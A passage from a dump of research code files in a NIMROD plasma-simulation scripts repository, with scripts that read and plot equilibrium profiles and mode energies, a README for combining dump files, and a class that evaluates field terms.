dvvalue[iv,jv,3*(nn+kStart[id])+2]=dvalue[iv][jv][3*nn+2]\n if(d1key.startswith(tuple(vsList))): \n gc.create_dataset(d1key, data=dsvalue)\n else:\n gc.create_dataset(d1key, data=dvvalue)\n\n for aname, avalue in gList[0][d1key].attrs.items():\n gc[d1key].attrs[aname] = avalue\n\n" }, { "alpha_fraction": 0.5656002163887024, "alphanum_fraction": 0.6097250580787659, "avg_line_length": 33.41414260864258, "blob_id": "1c925293837172ae49f4c37fbad43b9e749f12ab", "content_id": "45fb1062c45914f71c6e823b24904893ec714675", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10221, "license_type": "no_license", "max_line_length": 94, "num_lines": 297, "path": "/surfmnNim/eqfsa.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\n\nimport struct\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import interpolate\n\n\nplotprofs = True\n\neqfsaFile='/home/research/ehowell/SCRATCH/166439/03300_q104_flowtesting/orginal_exb/eqfsa.out'\n\nnumfields = 15\nnumIndex = 0\nmaxFields=0\nlastIndex=0\nthisFields=0\nwith open(eqfsaFile, 'r') as thisFile:\n for thisLine in thisFile:\n thisLine = thisFile.readline()\n thisWords = thisLine.split()\n print(len(thisWords))\n if len(thisWords)==numfields:\n if thisWords[0]=='i': continue\n thisIndex = int(thisWords[0])\n numIndex = max(numIndex, thisIndex)\n if thisIndex == lastIndex:\n thisFields+=1\n print(thisFields,thisIndex)\n else:\n thisFields=1\n print(thisFields,thisIndex)\n lastIndex=thisIndex\n maxFields=max(maxFields,thisFields)\n\nprint(numIndex)\nprint(maxFields)\ndata = np.loadtxt(eqfsaFile,skiprows=6)\nprint (data.shape())\n# Create dictionaries for each file with pertinent information\n# Not necessary for files with time data as the \"1\" dimension\nnpx={}\nnpy={}\n\n# data in binary with number of fields in numfields\nnumfields=15\nindex={}\npsin={}\nvPrime={}\nqg={}\nlam={}\ninvBsqr={}\nnd={}\nti={}\nte={}\npi={}\npe={}\nomega={}\nkpol={}\nDm={}\nDr={}\n\n\n#mu=(m**-1)\n\nfor findex in range(len(files)):\n fieldcount=count_time(files[findex],numfields)\n npx[files[findex]]=fieldcount\n\n index[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n psin[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n vPrime[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n qg[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n lam[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n invBsqr[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n nd[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n ti[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n te[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n pi[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n pe[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n omega[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n kpol[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n Dm[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n Dr[files[findex]]=np.zeros(npx[files[findex]], dtype = 'f',order = 'F')\n\n f=open(files[findex], 'rb')\n\n jj=0\n f.seek(0)\n\n while jj < npx[files[findex]] :\n #first bite is length of a string\n temp=f.read(4)\n blah=struct.unpack(\">l\",temp)\n temp=f.read(numfields*4)\n tf = struct.unpack(\">\"+numfields*'f', temp)\n #last byte is length of string read\n temp=f.read(4)\n index[files[findex]][jj]=tf[0]\n psin[files[findex]][jj]=tf[1]\n vPrime[files[findex]][jj]=tf[2]\n qg[files[findex]][jj]=tf[3]\n lam[files[findex]][jj]=tf[4]\n invBsqr[files[findex]][jj]=tf[5]\n nd[files[findex]][jj]=tf[6]\n ti[files[findex]][jj]=tf[7]\n te[files[findex]][jj]=tf[8] \n pi[files[findex]][jj]=tf[9]\n pe[files[findex]][jj]=tf[10]\n omega[files[findex]][jj]=tf[11]\n kpol[files[findex]][jj]=tf[12]\n Dm[files[findex]][jj]=tf[13]\n Dr[files[findex]][jj]=tf[14]\n \n jj=jj+1\n\n f.close()\n\nprint(index[files[0]][:])\n\nfor i in range(len(qg[files[0]])):\n mid2=(qg[files[0]][i]+2.)*(qg[files[0]][i+1]+2.)\n if mid2<0:\n irho2=i\n mid3=(qg[files[0]][i]+3.)*(qg[files[0]][i+1]+3.)\n if mid3<0:\n irho3=i\n mid4=(qg[files[0]][i]+4.)*(qg[files[0]][i+1]+4.)\n if mid4<0:\n irho4=i\n break\n\n\nif plotprofs:\n fig1,ax1=plt.subplots(1,2,figsize=(16,5))\n\n plt.locator_params(axis='y',nbins=4)\n\n plt.setp(ax1[0].get_xticklabels(), fontsize=20)\n plt.setp(ax1[0].get_yticklabels(), fontsize=20)\n ax1[0].plot(psin[files[0]][:],abs(qg[files[0]][:]),'b',label=r'$abs(q)$',lw=3,color='r')\n ax1[0].axvline(x=psin[files[0]][irho2],lw=3,color='g',ls='dashed',label=r'$q=2$')\n ax1[0].axvline(x=psin[files[0]][irho3],lw=3,color='m',ls='dashed',label=r'$q=3$')\n ax1[0].axvline(x=psin[files[0]][irho4],lw=3,color='orange',ls='dashed',label=r'$q=4$')\n\n\n ax1[0].axhline(y=1,lw=2,ls='dotted',color='k')\n\n\n ax1[0].legend(fontsize=15,loc=2,ncol=2)\n\n ax1[0].set_ylim(-5.0,5)\n\n plt.setp(ax1[1].get_xticklabels(), fontsize=20)\n plt.setp(ax1[1].get_yticklabels(), fontsize=20)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax1[1].axvline(x=psin[files[0]][irho2],lw=3,color='g',ls='dashed',label=r'$q=2$')\n ax1[1].axvline(x=psin[files[0]][irho3],lw=3,color='m',ls='dashed',label=r'$q=3$')\n ax1[1].axvline(x=psin[files[0]][irho4],lw=3,color='orange',ls='dashed',label=r'$q=4$')\n\n ax1[1].plot(psin[files[0]][:],omega[files[0]][:],'b',label=r'$\\Omega$',lw=5,color='b')\n\n\n ax1[1].axhline(y=0,lw=2,ls='dotted',color='k')\n\n ax1[1].yaxis.major.formatter._useMathText = True\n ax1[1].ticklabel_format(axis='y', style='sci', scilimits=(-2,-2))\n ax1[1].yaxis.offsetText.set_fontsize(18)\n ax1[1].tick_params(axis='y',labelsize=20)\n\n\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax1[0].set_xlabel(r'$\\rho$',fontsize=26)\n ax1[1].set_xlabel(r'$\\rho$',fontsize=26)\n ax1[1].set_ylabel(r'$\\Omega_{E\\times B}$',fontsize=26)\n\n #plt.savefig('fgprofs2.png',bbox_inches='tight')\n\n\n plt.show()\n\n\n fig1=plt.figure(figsize=(12,12))\n #plt.subplots_adjust(left=0.10, bottom=0.12, right=0.95, top=0.92, wspace=0.175)\n ax=fig1.add_subplot(331)\n plt.title(r'$f$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(psin[files[0]][:],psin[files[0]][:],'b',label=r'$f$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$f$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(332)\n plt.title(r'$\\mu_0 p$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(psin[files[0]][:],nd[files[0]][:],'b',label=r'$\\mu_0p$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$mu_0p$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(333)\n plt.title(r'$q$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(psin[files[0]][:],qg[files[0]][:],'b',label=r'$q$')\n ax.axvline(x=psin[files[0]][irho2],color='g')\n ax.axvline(x=psin[files[0]][irho3],color='m')\n ax.axvline(x=psin[files[0]][irho4],color='orange')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$q$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(334)\n plt.title(r'$Mach$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(psin[files[0]][:],mach[files[0]][:],'b',label=r'${\\rm Mach}$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'${\\rm Mach}$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(335)\n plt.title(r'$\\Omega_{E\\times B}$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(psin[files[0]][:],omgeb[files[0]][:],'b',label=r'$\\Omega_{E\\times B}$ v. $\\rho$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$\\Omega_{E\\times B}$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(336)\n plt.title(r'$\\Omega_{\\nabla P}$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(psin[files[0]][:],omgp[files[0]][:],'b',label=r'${\\rm Mach}$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$\\Omega_{\\nabla P}$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(337)\n plt.title(r'$n$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(psin[files[0]][:],n_den[files[0]][:],'b',label=r'$q$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$n$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n ax=fig1.add_subplot(338)\n plt.title(r'$ln(Residual)$ v. $\\rho$',fontsize=titlef)\n plt.setp(ax.get_xticklabels(), fontsize=tickf)\n plt.setp(ax.get_yticklabels(), fontsize=tickf)\n #sca=np.amax([abs(br1[:,13]),abs(bpi1[:,13]),abs(bbi1[:,13])])\n ax.plot(psin[files[0]][:],ne[files[0]][:],'b',label=r'$q$')\n #ax.set_xlim(0.6,0.8)\n #ax.set_ylim(-1,0.25)\n #ax.legend(loc=2,prop={'size':8})\n #plt.axvline(x=rs, color='k')\n ax.set_ylabel(r'$ln(Residual)$',fontsize=largef)\n ax.set_xlabel(r'$\\rho$',fontsize=largef)\n\n #plt.savefig('fgprofs1.png',bbox_inches='tight')\n\n plt.show()\n" }, { "alpha_fraction": 0.5755943059921265, "alphanum_fraction": 0.6396196484565735, "avg_line_length": 30.86868667602539, "blob_id": "ee323f31df427da30ca4e1c7d487af6b88f8d366", "content_id": "bf883b5f5d505da44dcd94fdd48a8a7b4f8aed40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3155, "license_type": "no_license", "max_line_length": 109, "num_lines": 99, "path": "/plotingScripts/drawlogen.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python3\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math as m\n\ndata = np.loadtxt('/home/research/ehowell/SCRATCH/166439/03300_2_fl/19091702/lphi5_nolinear_fresh/logen.txt')\n\nprint (data.shape)\nvals = data.shape\n#print vals[0]\nfmode =11\nlenl=int(vals[0]/fmode)\ntime = np.zeros(int(vals[0]/fmode),dtype='float')\nlogme = np.zeros((fmode, int(vals[0]/fmode)),dtype='float')\nlogke = np.zeros((fmode, int(vals[0]/fmode)),dtype='float')\nme = np.zeros((fmode, int(vals[0]/fmode)),dtype='float')\nke = np.zeros((fmode, int(vals[0]/fmode)),dtype='float')\n\n\nfor ii in range(0,lenl):\n time[ii] = data[ii*fmode,1]*1000000\n for jj in range(0,fmode):\n logme[jj,ii]=data[ii*fmode+jj,4]\n logke[jj,ii]=data[ii*fmode+jj,5]\n me[jj,ii]=m.pow(10,data[ii*fmode+jj,4])\n ke[jj,ii]=m.pow(10,data[ii*fmode+jj,5])\n \n\n\n\nfig=plt.figure(figsize=(10,4))\n#fig.subplots_adjust(left=0.5)\n#ax.yaxis.labelpad=35\nax = fig.add_subplot(121)\n#ax.plot(time,logme[0,:],ls='-.',label='n=0')\nax.plot(time,logme[1,:],ls='-',label='n=1')\nax.plot(time,logme[2,:],ls=':',label='n=2')\nax.plot(time,logme[3,:],ls=':',label='n=3')\nax.plot(time,logme[4,:],ls='-',label='n=4')\nax.plot(time,logme[5,:],ls='-.',label='n=5')\nax.plot(time,logme[6,:],ls='-',label='n=6')\nax.plot(time,logme[7,:],ls=':',label='n=7')\nax.plot(time,logme[8,:],ls=':',label='n=8')\nax.plot(time,logme[9,:],ls='-',label='n=9')\nax.plot(time,logme[10,:],ls='-.')\nax.set_ylabel(r\"Log Energy\", size=16)\nax.set_xlabel(r\"Time($\\mu$s)\",size=16)\n#plt.legend(ncol=2, loc=4)\n#ax.set_xlim([0.0,0.5])\nax.set_ylim([-1,2])\n#ax.yaxis.labelpad=35\nplt.title(r'Magnetic Energy', size=16)\nax = fig.add_subplot(122)\n#ax.plot(time,logke[0,:],ls='-.',label='n=0')\nax.plot(time,logke[1,:],ls='-',label='n=1')\nax.plot(time,logke[2,:],ls=':',label='n=2')\nax.plot(time,logke[3,:],ls=':',label='n=3')\nax.plot(time,logke[4,:],ls='-',label='n=4')\nax.plot(time,logke[5,:],ls='-.',label='n=5')\nax.plot(time,logke[6,:],ls='-',label='n=6')\nax.plot(time,logke[7,:],ls=':', label='n=7')\nax.plot(time,logke[8,:],ls=':', label='n=8')\nax.plot(time,logke[9,:],ls='-',label='n=9')\nax.plot(time,logke[10,:],ls='-.')\nax.set_ylabel(r\"Log Energy\", size=16)\nax.set_xlabel(r\"Time($\\mu$s)\",size=16)\n#ax.set_xlim([0.0,0.5])\nax.set_ylim([-3.0,1])\nplt.legend(ncol=3, loc=4, columnspacing =1,prop={'size':12})\n#ax.yaxis.labelpad=35\nplt.title(r'Kinetic Energy', size=16)\nplt.tight_layout()\n#ax.legend(loc=2)\nplt.show()\n\nfig=plt.figure(figsize=(10,4))\n#fig.subplots_adjust(left=0.5)\n#ax.yaxis.labelpad=35\nax = fig.add_subplot(121)\nax.plot(time,me[0,:],ls='-.',label='n=0')\nax.set_ylabel(r\"Energy\", size=16)\nax.set_xlabel(r\"Time($\\mu$s)\",size=16)\n#plt.legend(ncol=2, loc=4)\n#ax.set_xlim([0.0,0.5])\n#ax.set_ylim([-1,2])\n#ax.yaxis.labelpad=35\nplt.title(r'Magnetic Energy', size=16)\nax = fig.add_subplot(122)\nax.plot(time[1:],ke[0,1:],ls='-.',label='n=0')\nax.set_ylabel(r\"Energy\", size=16)\nax.set_xlabel(r\"Time($\\mu$s)\",size=16)\n#ax.set_xlim([0.0,0.5])\n#ax.set_ylim([4.14,4.16])\nplt.legend(ncol=3, loc=1, columnspacing =1,prop={'size':12})\n#ax.yaxis.labelpad=35\nplt.title(r'Kinetic Energy', size=16)\nplt.tight_layout()\n#ax.legend(loc=2)\nplt.show()\n" }, { "alpha_fraction": 0.6749379634857178, "alphanum_fraction": 0.6885855793952942, "avg_line_length": 27.821428298950195, "blob_id": "acee85cce7634d43e286e5cea75d96809aab3a0b", "content_id": "6ae1c6a95f30e396393a581624f2060d34b19433", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 806, "license_type": "no_license", "max_line_length": 87, "num_lines": 28, "path": "/combineDump/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "# combineDump\nThese scripts combine dumpfiles with multiple Fourier modes, into one larger dump file.\n## Inputs:\n - nimrod h5 dump with each perturbation\n## Outputs:\n - dumpgll.00000.h5 with all perturbations\n\n## Key Steps:\n - Read dump files\n - Combine Fourier modes\n - Write new h5 dump files\n\n## Status: \n - Code runs and works for 2 dumps files with 1 mode each\n - Needs more testing\n - Slow\n\n## Todo:\n - [x] Make sure I have h5 py\n - [x] Write dumpTime\n - [x] Combine and write keff\n - [x] Write seams\n - [x] Write file attributes\n - [x] Combine and write rblocks\n - [x] Write code to combine two dumpfiles\n - [x] Test the output with one fourier mode in each dump file \n - [ ] Test the output with multiple fourier mode in a dump file \n - [ ] Speed up copy (can I avoid the looping)" }, { "alpha_fraction": 0.5278750658035278, "alphanum_fraction": 0.5507836937904358, "avg_line_length": 35.74472427368164, "blob_id": "26d9fe7ffce2cd1badc30015d8ea21a0f3c0e554", "content_id": "f78e7872a5adf7310e0ba6fe9d5ea0ac906a36f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 17417, "license_type": "no_license", "max_line_length": 118, "num_lines": 474, "path": "/ntmscripts/ntm_fields.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport f90nml\nimport eval_nimrod as eval\nimport field_class as fc\nimport numpy as np\nfrom scipy.fft import fft, ifft\nimport plot_nimrod as pn\nimport matplotlib.pyplot as plt\nimport time\nimport nim_timer as timer\n\nclass ntmfields:\n ''' ntm fields is a class for reading/storing nimrod data on a mesh\n it also calculates the different terms in nimrods field advances\n this seperates the evaulation of these fields from fsa interation\n or plotting on various meshs\n '''\n\n def __init__(self,dumpfile,nimrodin):\n self.dumpfile=dumpfile\n self.nimrodin=nimrodin\n self.eval=None\n self.grid=None\n self.fielddict={}\n self.ndict={}\n self.edict={}\n self.evalb_timer=0.0\n self.fft_timer=0.0\n self.ndmode=0\n self.neq=False\n self.npert=False\n self.vdmode=0\n self.veq=False\n self.vpert=False\n self.diff_dmode=0\n\n if self.nimrodin is not None:\n self.nml=f90nml.read(self.nimrodin)\n self.grid_nml=self.nml.get('grid_input',{})\n self.equil_nml=self.nml.get('equil_input',{})\n self.const_nml=self.nml.get('const_input',{})\n self.physics_nml=self.nml.get('physics_input',{})\n self.closure_nml=self.nml.get('closure_input',{})\n self.solver_nml=self.nml.get('solver_input',{})\n self.output_nml=self.nml.get('output_input',{})\n self.set_physical_constants()\n self.set_evalnimrod()\n return None\n\n def set_physical_constants(self):\n '''\n Read namelists and set physical constants\n '''\n self.mu0=self.const_nml.get('mu0_input',np.pi*4.0e-7)\n self.me=self.const_nml.get('me_input',9.1093898e-31)\n self.mi=self.const_nml.get('mi_input',3.3435860e-27)\n self.zeff=self.const_nml.get('zeff_input',1.0)\n self.qe=self.const_nml.get('chrg_input',1.60217733e-19)\n self.gamma=self.const_nml.get('gam_input',5./3.)\n self.kblz=self.const_nml.get('kblz_input',1.60217733e-19)\n self.clight=self.const_nml.get('c_input',2.99792458e8)\n return None\n\n def set_evalnimrod(self):\n '''\n Set Eval Nimrod\n '''\n if self.eval is None:\n self.eval=eval.EvalNimrod(self.dumpfile,fieldlist='nvbtjpd')\n return None\n\n def get_gridrzp(self,grid):\n '''\n returns grid and rzp, and grid for a given grid\n if grid=None, try self.grid\n elif grid is an EvalGrid insatnace\n else np grid\n '''\n if grid is None:\n if self.grid is None:\n print(\"ntm_fields_grid is not set\")\n raise ValueError\n else:\n grid=self.grid\n rzp=self.grid.rzp\n elif isinstance(grid,eval.EvalGrid):\n rzp=grid.rzp\n else:\n rzp=grid\n return grid,rzp\n\n @timer.timer_func\n def fft(self,pert,axis=-1):\n ''' NIMROD stores it's field data as f(phi) = sum_{-n}^n f_n exp(inphi)\n This implies that the normalization 1/N should be done in the transform\n from physical space to fourier space\n This is the one option that scipi.fft does not support, but why?\n '''\n fpert = fft(pert.data,axis=axis,norm=None)/pert.data.shape[axis]\n return fpert\n\n def set_method(self,method):\n if method == \"induction\":\n self.ndmode=1\n self.neq=True\n self.npert=False\n self.vdmode=1\n self.veq=True\n self.vpert=True\n self.diff_dmode=1\n\n @timer.timer_func\n def eval_symm(self,fname,rzp,dmode,eq):\n if eq not in [1,3]:\n print(\"eval_symm only works for eq=1 or 3\")\n raise ValueError\n newrzp=rzp[:,0]\n field=self.eval.eval_field(fname,newrzp,dmode=dmode,eq=eq)\n field=field.reshape(*field.shape,1)\n field=np.broadcast_to(field,(field.shape[0],rzp.shape[1]))\n return field\n\n @timer.timer_func\n def eval_n(self,grid=None,fft=False):\n grid,rzp=self.get_gridrzp(grid)\n if self.neq:\n if len(rzp.shape)==2:\n field=self.eval_symm('n',rzp,dmode=self.ndmode,eq=1)\n self.fielddict['neq']=fc.Scalar(field,rzp,self.ndmode,True)\n else:\n field=self.eval.eval_field('n', grid, dmode=self.ndmode, eq=1)\n self.fielddict['neq']=fc.Scalar(field,rzp,self.ndmode,True)\n if self.npert:\n field=self.eval.eval_field('n', grid, dmode=self.ndmode, eq=0)\n self.fielddict['npert']=fc.Scalar(field,rzp,self.ndmode,True)\n if fft:\n self.fielddict['nfour']=self.fft(field)\n return None\n\n @timer.timer_func\n def eval_v(self,grid=None,fft=False):\n grid,rzp=self.get_gridrzp(grid)\n if self.veq:\n if len(rzp.shape)==2:\n field=self.eval_symm('v',rzp,dmode=self.vdmode,eq=1)\n self.fielddict['veq']=fc.Vector(field,rzp,self.vdmode,True)\n else:\n field=self.eval.eval_field('v', grid, dmode=self.vdmode,eq=1)\n self.fielddict['veq']=fc.Vector(field,rzp,self.vdmode,True)\n if self.vpert:\n field=self.eval.eval_field('v', grid, dmode=self.vdmode, eq=0)\n self.fielddict['vpert']=fc.Vector(field,rzp,self.vdmode,True)\n if fft:\n self.fielddict['vfour']=self.fft(field)\n return None\n\n @timer.timer_func\n def eval_b(self,grid=None,fft=False):\n grid,rzp=self.get_gridrzp(grid)\n if len(rzp.shape)==2:\n field=self.eval_symm('b',rzp,dmode=1,eq=1)\n self.fielddict['beq']=fc.Vector(field,rzp,1,True)\n field=self.eval_symm('b',rzp,dmode=1,eq=3)\n self.fielddict['b0']=fc.Vector(field,rzp,1,True)\n else:\n field=self.eval.eval_field('b',grid,dmode=1,eq=1)\n self.fielddict['beq']=fc.Vector(field,rzp,1,True)\n field=self.eval.eval_field('b',grid,dmode=1,eq=3)\n self.fielddict['b0']=fc.Vector(field,rzp,1,True)\n\n field=self.eval.eval_field('b',grid,dmode=1, eq=0)\n self.fielddict['bpert']=fc.Vector(field,rzp,1,True)\n if fft:\n self.fielddict['bfour']=self.fft(field)\n return None\n\n @timer.timer_func\n def eval_fsa_beq2(self,grid=None):\n grid,rzp=self.get_gridrzp(grid)\n self.dump_fsa_beq2 =self.output_nml.get('dump_fsa_beq2',False)\n if self.dump_fsa_beq2:\n if len(rzp.shape)==2:\n field=self.eval_symm('fsa_beq2', grid, dmode=1, eq=1)\n self.fielddict['fsa_beq2']=fc.Scalar(field,rzp,1,True)\n else:\n field=self.eval.eval_field('fsa_beq2', grid, dmode=1, eq=1)\n self.fielddict['fsa_beq2']=fc.Scalar(field,rzp,1,True)\n else:\n self.fielddict['fsa_beq2']=0.0\n return None\n\n @timer.timer_func\n def eval_j(self,grid=None,fft=False):\n grid,rzp=self.get_gridrzp(grid)\n if len(rzp.shape)==2:\n field=self.eval_symm('j',rzp,dmode=1,eq=1)\n self.fielddict['jeq']=fc.Vector(field,rzp,1,True)\n else:\n field=self.eval.eval_field('j', grid, dmode=1, eq=1)\n self.fielddict['jeq']=fc.Vector(field,rzp,1,True)\n field=self.eval.eval_field('j', grid, dmode=1, eq=0)\n self.fielddict['jpert']=fc.Vector(field,rzp,1,True)\n if fft:\n self.fielddict['jfour']=self.fft(field)\n return None\n\n @timer.timer_func\n def eval_neo_mask(self,grid=None):\n grid,rzp=self.get_gridrzp(grid)\n r0=self.closure_nml.get('neo_axis_r',0)\n z0=self.closure_nml.get('neo_axis_z',0)\n rbump=self.closure_nml.get('neo_bump_r0',1.0)\n shape=list(rzp.shape)\n shape[0]=4\n fval=np.zeros(shape)\n fval[0]=1.0\n r2=(np.power(rzp[0]-r0,2)+np.power(rzp[1]-z0,2))/rbump**2\n if isinstance(r2,np.float):\n if r2<1.0:\n #check\n bump=np.exp(1-1./(1.-r2))\n dbumpdr2=-r2/(1-r2)**3\n dr2dx=2*(rzp[0]-r0)/rbump**2\n dr2dz=2*(rzp[1]-r0)/rbump**2\n d2r2dxx=2/rbump**2\n d2r2dyy=2/rbump**2\n d2r2dxy=0.0\n #print(type(bump),type(dbumpdr2),type(dr2dx))\n #print(dbumpdr2.shape)\n fval[0]=1.0-bump\n fval[1]=-bump*dbumpdr2*dr2dx\n fval[2]=-bump*dbumpdr2*dr2dz\n else:\n result=np.where(r2<1.0)\n for indicies in zip(*result):\n #check\n bump=np.exp(1-1./(1.-r2[indicies]))\n dbumpdr2=-r2[indicies]/(1-r2[indicies])**3\n dr2dx=2*(rzp[(0,)+indicies]-r0)/rbump**2\n dr2dz=2*(rzp[(1,)+indicies]-r0)/rbump**2\n d2r2dxx=2/rbump**2\n d2r2dyy=2/rbump**2\n d2r2dxy=0.0\n #print(type(bump),type(dbumpdr2),type(dr2dx))\n #print(dbumpdr2.shape)\n fval[(0,)+indicies]=1.0-bump\n fval[(1,)+indicies]=-bump*dbumpdr2*dr2dx\n fval[(2,)+indicies]=-bump*dbumpdr2*dr2dz\n return fc.Scalar(fval,rzp,1,True)\n\n @timer.timer_func\n def eval_p(self,grid=None):\n grid,rzp=self.get_gridrzp(grid)\n if len(rzp.shape)==2:\n field=self.eval_symm('p',rzp,dmode=2,eq=1)\n self.fielddict['peq']=fc.Scalar(field,rzp,2,True)\n else:\n field=self.eval.eval_field('p',grid,dmode=2,eq=1)\n self.fielddict['peq']=fc.Scalar(field,rzp,2,True)\n field=self.eval.eval_field('p',grid,dmode=2,eq=0)\n self.fielddict['ppert']=fc.Scalar(field,rzp,2,True)\n self.fielddict['pfour']=self.fft(field)\n return None\n\n @timer.timer_func\n def eval_diff(self,grid=None):\n ''' Get the diff shape scalars from eval nimrod\n Some extralogic is needed to pull apart the different\n diff shape scalar fields from the output of eval_field\n note when ds_nqty>1\n elecd_diff is 0\n iso_visc_diff is 1\n '''\n diff_dmode=self.diff_dmode\n grid,rzp=self.get_gridrzp(grid)\n self.ds_nqty = self.equil_nml.get('ds_nqty',1)\n if len(rzp.shape)==2:\n field=self.eval_symm('d',rzp,dmode=diff_dmode,eq=1)\n else:\n field=self.eval.eval_field('d',grid,dmode=diff_dmode, eq=1)\n diff_shape=[]\n ishape=list(field.shape)\n ishape[0]=ishape[0]//self.ds_nqty\n ifield= np.zeros(ishape)\n for ii in range(self.ds_nqty):\n ifield[0] = field[ii]\n if diff_dmode>0:\n start=self.ds_nqty+ii*3\n end=start+3\n ifield[1:4]=field[start:end]\n if diff_dmode>1:\n start=self.ds_nqty*4+ii*6\n end=start+6\n ifield[4:10]=field[start:end]\n diff_shape.append(fc.Scalar(ifield,rzp,diff_dmode,True))\n self.fielddict['diff_shape']=diff_shape\n return None\n\n #begin coding of field equations\n def continuity(self,grid=None):\n if not 'neq' in self.fielddict:\n self.eval_n(grid)\n if not 'veq' in self.fielddict:\n self.eval_v(grid)\n\n nddiff = self.physics_nml.get('nd_diff',0.0)\n veq=self.fielddict['veq']\n vpert=self.fielddict['vpert']\n neq=self.fielddict['neq']\n npert=self.fielddict['npert']\n\n advecteq=veq.dot(neq.grad())\n advectlin=veq.dot(npert.grad())+vpert.dot(neq.grad())\n advectnon=vpert.dot(npert.grad())\n 